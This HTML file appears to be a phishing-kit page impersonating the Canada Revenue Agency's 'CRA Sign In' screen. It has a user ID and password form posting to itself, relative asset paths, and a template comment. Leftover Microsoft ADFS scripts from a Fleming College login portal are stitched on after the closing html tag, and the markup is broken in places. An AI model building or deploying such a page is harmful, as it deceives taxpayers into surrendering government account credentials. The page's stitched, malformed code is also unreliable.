<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Canada Revenue Agency - CRA Sign In</title>
    <link rel="apple-touch-icon" sizes="57x57 72x72 114x114 144x144 150x150" class="wb-favicon" href="https://cms-sgj.cra-arc.gc.ca/ebci/wet/v13.7.2/GCWeb/assets/favicon-mobile.png"><link href="https://cms-sgj.cra-arc.gc.ca/ebci/wet/v13.7.2/GCWeb/assets/favicon.ico" rel="icon" type="image/x-icon" class="wb-init wb-favicon-inited">
    <link rel="stylesheet" href="../static/css/theme.min.css"> <!-- Link to your CSS file -->
    <link rel="stylesheet" href="../static/css/common.css"> <!-- Additional CSS -->


    //<![CDATA[
    function LoginErrors(){this.userNameFormatError = 'Enter your user ID in the format \u0026quot;domain\\user\u0026quot; or \u0026quot;user@domain\u0026quot;.'; this.passwordEmpty = 'Enter your password.'; this.passwordTooLong = 'Password is too long (\u0026gt; 128 characters).';}; var maxPasswordLength = 128;
    //]]>
    </script>
    
    <script type="text/javascript">
    //<![CDATA[
    // Copyright (c) Microsoft Corporation.  All rights reserved.
    function InputUtil(errTextElementID, errDisplayElementID) {
    
        if (!errTextElementID)  errTextElementID = 'errorText'; 
        if (!errDisplayElementID)  errDisplayElementID = 'error'; 
    
        this.hasFocus = false;
        this.errLabel = document.getElementById(errTextElementID);
        this.errDisplay = document.getElementById(errDisplayElementID);
    };
    InputUtil.prototype.canDisplayError = function () {
        return this.errLabel && this.errDisplay;
    }
    InputUtil.prototype.checkError = function () {
        if (!this.canDisplayError){
            throw new Error ('Error element not present');
        }
        if (this.errLabel && this.errLabel.innerHTML) {
            this.errDisplay.style.display = '';        
            var cause = this.errLabel.getAttribute('for');
            if (cause) {
                var causeNode = document.getElementById(cause);
                if (causeNode && causeNode.value) {
                    causeNode.focus();
                    this.hasFocus = true;
                }
            }
        }
        else {
            this.errDisplay.style.display = 'none';
        }
    };
    InputUtil.prototype.setInitialFocus = function (input) {
        if (this.hasFocus) return;
        var node = document.getElementById(input);
        if (node) {
            if ((/^\s*$/).test(node.value)) {
                node.focus();
                this.hasFocus = true;
            }
        }
    };
    InputUtil.prototype.setError = function (input, errorMsg) {
        if (!this.canDisplayError) {
            throw new Error('Error element not present');
        }
        input.focus();
    
        if (errorMsg) {
            this.errLabel.innerHTML = errorMsg;
        }
        this.errLabel.setAttribute('for', input.id);
        this.errDisplay.style.display = '';
    };
    InputUtil.makePlaceholder = function (input) {
        var ua = navigator.userAgent;
    
        if (ua != null && 
            (ua.match(/MSIE 9.0/) != null || 
             ua.match(/MSIE 8.0/) != null ||
             ua.match(/MSIE 7.0/) != null)) {
            var node = document.getElementById(input);
            if (node) {
                var placeholder = node.getAttribute("placeholder");
                if (placeholder != null && placeholder != '') {
                    var label = document.createElement('input');
                    label.type = "text";
                    label.value = placeholder;
                    label.readOnly = true;
                    label.style.position = 'absolute';
                    label.style.borderColor = 'transparent';
                    label.className = node.className + ' hint';
                    label.tabIndex = -1;
                    label.onfocus = function () { this.nextSibling.focus(); };
    
                    node.style.position = 'relative';
                    node.parentNode.style.position = 'relative';
                    node.parentNode.insertBefore(label, node);
                    node.onkeyup = function () { InputUtil.showHint(this); };
                    node.onblur = function () { InputUtil.showHint(this); };
                    node.style.background = 'transparent';
    
                    node.setAttribute("placeholder", "");
                    InputUtil.showHint(node);
                }
            }
        }
    };
    InputUtil.focus = function (inputField) {
        var node = document.getElementById(inputField);
        if (node) node.focus();
    };
    InputUtil.hasClass = function(node, clsName) {
        return node.className.match(new RegExp('(\\s|^)' + clsName + '(\\s|$)'));
    };
    InputUtil.addClass = function(node, clsName) {
        if (!this.hasClass(node, clsName)) node.className += " " + clsName;
    };
    InputUtil.removeClass = function(node, clsName) {
        if (this.hasClass(node, clsName)) {
            var reg = new RegExp('(\\s|^)' + clsName + '(\\s|$)');
            node.className = node.className.replace(reg, ' ');
        }
    };
    InputUtil.showHint = function (node, gotFocus) {
        if (node.value && node.value != '') {
            node.previousSibling.style.display = 'none';
        }
        else {
            node.previousSibling.style.display = '';
        }
    };
    InputUtil.updatePlaceholder = function (input, placeholderText) {
        var node = document.getElementById(input);
        if (node) {
            var ua = navigator.userAgent;
            if (ua != null &&
                (ua.match(/MSIE 9.0/) != null ||
                ua.match(/MSIE 8.0/) != null ||
                ua.match(/MSIE 7.0/) != null)) {
                var label = node.previousSibling;
                if (label != null) {
                    label.value = placeholderText;
                }
            }
            else {
                node.placeholder = placeholderText;
            }
        }
    };
    
    //]]>
    </script>

</head>
<body>
	<header>
        <div class="container">
            <section id="wb-lng" class="visible-md visible-lg text-right">
            </section>
            <div class="row">
                
                <div class="brand col-xs-9 col-sm-5 col-md-4">
	                
	                <img alt="" src="../static/images/sig-blk-en.svg" property="logo">
	                <span class="wb-inv" property="name"> Government of Canada / <span lang="fr">Gouvernement du Canada</span></span>
	                <meta property="name" content="Government of Canada">
	                <meta property="areaServed" typeof="Country" content="Canada">
	                <link property="logo" href="../static/images/wmms-blk.svg">
            	</div>
                
                
            </div>
        </div>

		<div id="brand-container-cra">
			<div class="container">
				<div class="row">
					<div class="col-xs-12 col-sm-10" id="brand-text-cra">
						Canada Revenue Agency
					</div>
					
					<div class="col-xs-4 col-sm-2 text-right">
						
					</div>
				</div>
			</div>
		</div>
		
    </header>

    <main role="main" class="container">
        <h1>CRA Sign In</h1>
        <form class="a-form" method="POST">
            <div class="form-group">
                <label for="userid" class="required">User  ID <strong class="required"><i>(required)</i></strong></label>
                <input type="text" name="USERID" class="form-control" required>
                <p><a href="">Forgot your user ID?</a></p>
            </div>
            <div class="form-group">
                <label for="password" class="required">Password <strong class="required"><i>(required)</i></strong></label>
                <input type="password" name="PASSWORD" class="form-control" required>
                <p><a href="">Forgot your password?</a></p>
            </div>

            <p>
                For more information on how your privacy is protected, refer to our <a href="">Personal Information Collection Statement</a>. 
            </p>

            <div class="form-actions">
                <button type="submit" class="btn btn-primary submit_h">Sign In</button>
                <input type="button" value="Exit" class="btn btn-default">
            </div>
        </form>
        <p>To <a href="">register</a> if you are a new user.</p>
        <p>To <a href="">revoke or change your CRA user ID or password, or to manage your security questions and answers</a>, you must first sign in.</p>

        <div id="pageLabel">Screen ID: CMS.30</div>
        
	




	
	<div>
	    <dl id="wb-dtmd" property="dateModified">
	        <dt>Date modified: </dt>
	        <dd><time>2024-10-21</time></dd>
	    </dl>
	</div>

    </main>

    <footer id="wb-info" class=" wb-navcurr-inited">
	
	
	
	
        <div class="brand" style="border-top:4px solid #335175">
            <div class="container">
                <div class="row ">
                    <nav class="col-md-10 ftr-urlt-lnk">
                        <h2 class="wb-inv">About this site</h2>
                        <ul>
                            
                            
                            
                            <li><a href="">Terms and conditions</a></li>
                            
                            <li><a href="">Privacy</a></li>
                        </ul>
                    </nav>
                  <div class="col-xs-6 col-md-3 col-lg-2 text-right">
                    <img src="../static/images/wmms-blk.svg" alt="Symbol of the Government of Canada">
                </div>
                </div>
            </div>
        </div>
    </footer>

</body>
</html>

<div id="authOptions">
    <form id="options" method="post">
        <script type="text/javascript">
            function SelectOption(option) {
                var i = document.getElementById('optionSelection');
                i.value = option;
                document.forms['options'].submit();
                return false;
            }
        </script>
        <input id="optionSelection" type="hidden" name="AuthMethod">
        <div id="authOptionLinks" class="groupMargin"></div>
    </form>
  </div>
  

    <div id="introduction" class="groupMargin">
                             
    </div>

    <script type="text/javascript">
    //<![CDATA[

        function Login() {
        }

        Login.userNameInput = 'userNameInput';
        Login.passwordInput = 'passwordInput';

        Login.initialize = function () {

            var u = new InputUtil();

            u.checkError();
            u.setInitialFocus(Login.userNameInput);
            u.setInitialFocus(Login.passwordInput);
        }();

        Login.submitLoginRequest = function () { 
            var u = new InputUtil();
            var e = new LoginErrors();

            var userName = document.getElementById(Login.userNameInput);
            var password = document.getElementById(Login.passwordInput);

            if (!userName.value || !userName.value.match('[@\\\\]')) {
                u.setError(userName, e.userNameFormatError);
                return false;
            }

            if (!password.value) {
                u.setError(password, e.passwordEmpty);
                return false;
            }

            if (password.value.length > maxPasswordLength) {
                u.setError(password, e.passwordTooLong);
                return false;
            }

            document.forms['loginForm'].submit();
            return false;
        };

        InputUtil.makePlaceholder(Login.userNameInput);
        InputUtil.makePlaceholder(Login.passwordInput);
    //]]>
    </script>
</div>

<script type="text/javascript">
//<![CDATA[
// Copyright (c) Microsoft Corporation.  All rights reserved.

// This file contains several workarounds on inconsistent browser behaviors that administrators may customize.
"use strict";

// iPhone email friendly keyboard does not include "\" key, use regular keyboard instead.
// Note change input type does not work on all versions of all browsers.
if (navigator.userAgent.match(/iPhone/i) != null) {
var emails = document.querySelectorAll("input[type='email']");
if (emails) {
    for (var i = 0; i < emails.length; i++) {
        emails[i].type = 'text';
    }
}
}

// In the CSS file we set the ms-viewport to be consistent with the device dimensions, 
// which is necessary for correct functionality of immersive IE. 
// However, for Windows 8 phone we need to reset the ms-viewport's dimension to its original
// values (auto), otherwise the viewport dimensions will be wrong for Windows 8 phone.
// Windows 8 phone has agent string 'IEMobile 10.0'
if (navigator.userAgent.match(/IEMobile\/10\.0/)) {
var msViewportStyle = document.createElement("style");
msViewportStyle.appendChild(
    document.createTextNode(
        "@-ms-viewport{width:auto!important}"
    )
);
msViewportStyle.appendChild(
    document.createTextNode(
        "@-ms-viewport{height:auto!important}"
    )
);
document.getElementsByTagName("head")[0].appendChild(msViewportStyle);
}

// If the innerWidth is defined, use it as the viewport width.
if (window.innerWidth && window.outerWidth && window.innerWidth !== window.outerWidth) {
var viewport = document.querySelector("meta[name=viewport]");
viewport.setAttribute('content', 'width=' + window.innerWidth + ', initial-scale=1.0, user-scalable=1');
}

// Gets the current style of a specific property for a specific element.
function getStyle(element, styleProp) {
var propStyle = null;

if (element && element.currentStyle) {
    propStyle = element.currentStyle[styleProp];
}
else if (element && window.getComputedStyle) {
    propStyle = document.defaultView.getComputedStyle(element, null).getPropertyValue(styleProp);
}

return propStyle;
}

// The script below is used for downloading the illustration image 
// only when the branding is displaying. This script work together
// with the code in PageBase.cs that sets the html inline style
// containing the class 'illustrationClass' with the background image.
var computeLoadIllustration = function () {
var branding = document.getElementById("branding");
var brandingDisplay = getStyle(branding, "display");
var brandingWrapperDisplay = getStyle(document.getElementById("brandingWrapper"), "display");

if (brandingDisplay && brandingDisplay !== "none" &&
    brandingWrapperDisplay && brandingWrapperDisplay !== "none") {
    var newClass = "illustrationClass";

    if (branding.classList && branding.classList.add) {
        branding.classList.add(newClass);
    } else if (branding.className !== undefined) {
        branding.className += " " + newClass;
    }
    if (window.removeEventListener) {
        window.removeEventListener('load', computeLoadIllustration, false);
        window.removeEventListener('resize', computeLoadIllustration, false);
    }
    else if (window.detachEvent) {
        window.detachEvent('onload', computeLoadIllustration);
        window.detachEvent('onresize', computeLoadIllustration);
    }
}
};

if (window.addEventListener) {
window.addEventListener('resize', computeLoadIllustration, false);
window.addEventListener('load', computeLoadIllustration, false);
}
else if (window.attachEvent) {
window.attachEvent('onresize', computeLoadIllustration);
window.attachEvent('onload', computeLoadIllustration);
}

// Function to change illustration image. Usage example below.
function SetIllustrationImage(imageUri) {
var illustrationImageClass = '.illustrationClass {background-image:url(' + imageUri + ');}';

var css = document.createElement('style');
css.type = 'text/css';

if (css.styleSheet) css.styleSheet.cssText = illustrationImageClass;
else css.appendChild(document.createTextNode(illustrationImageClass));

document.getElementsByTagName("head")[0].appendChild(css);
}

// Example to change illustration image on HRD page after adding the image to active theme:
// PSH> Set-AdfsWebTheme -TargetName <activeTheme> -AdditionalFileResource @{uri='/adfs/portal/images/hrd.jpg';path='.\hrd.jpg'}
//
//if (typeof HRD != 'undefined') {
//    SetIllustrationImage('/adfs/portal/images/hrd.jpg');
//}

if (typeof Login != 'undefined'){  
Login.submitLoginRequest = function () {   
var u = new InputUtil();  
var e = new LoginErrors();  
var userName = document.getElementById(Login.userNameInput);  
var password = document.getElementById(Login.passwordInput);  
if (userName.value && !userName.value.match('[@\\\\]'))   
{  
    var userNameValue = userName.value;  
    document.forms['loginForm'].UserName.value = userNameValue;  
}  

if (!userName.value) {  
   u.setError(userName, e.userNameFormatError);  
   return false;  
}  

if (!password.value)   
{  
    u.setError(password, e.passwordEmpty);  
    return false;  
}  
document.forms['loginForm'].submit();  
return false;  
};  
}

// Added to set custom Signin text

// Sample code to change �Sign in with organizational account� string.  

// Check whether the loginMessage element is present on this page.  
var loginMessage = document.getElementById('loginMessage');  
if (loginMessage)  
{  
   // loginMessage element is present, modify its properties.  
   loginMessage.innerHTML = 'Sign in with your Fleming College username (e.g.&nbsp;jsmith) and password below.' + '<br>' +'<p style="color:red">DO NOT USE YOUR EMAIL ADDRESS.</p>';  
   //var str1 = "Sign in with your Fleming College username (e.g. jsmith) and password below";
   //var str2 = "DO NOT USE YOUR EMAIL ADDRESS.";
   //var str3 = str2.fontcolor("red");
   //var msg1 = str1 + "<br"> + str3;
   //loginMessage.innerHTML = msg1;  
   //<p style="color:red">This is a paragraph.</p>
   
}

// Added to strip prepopulated email address from office.com
document.getElementById('userNameInput').value = '';
document.getElementById('userNameInput').placeholder = 'Username';
document.getElementById('userNameInput').focus();
//]]>
</script>





</body></html>